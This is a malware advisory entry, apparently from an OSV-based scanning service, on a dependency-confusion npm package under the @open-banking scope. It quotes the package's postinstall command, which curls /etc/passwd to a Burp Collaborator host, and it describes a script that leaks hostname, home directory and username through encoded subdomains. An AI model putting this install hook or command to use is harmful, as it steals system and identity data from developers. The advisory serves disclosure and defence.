@open-banking/cabinet-providers @999.9.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5392
Ecosystem
npm
Summary
@open-banking/cabinet-providers@999.9.5 is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle. package.json declares "postinstall": "node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com" , which posts the contents of /etc/passwd (prefixed by the installer's hostname as a subdomain) to a Burp Collaborator (OAST) endpoint. The bundled scripts/scream3gg.js hex-encodes os.hostname() , os.homedir() , and os.userInfo().username , splits the result into 50-character chunks joined by . , and fetches http://<chunks>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com over plain HTTP — leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on npm install with no user consent.
Source: amazon-inspector (376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.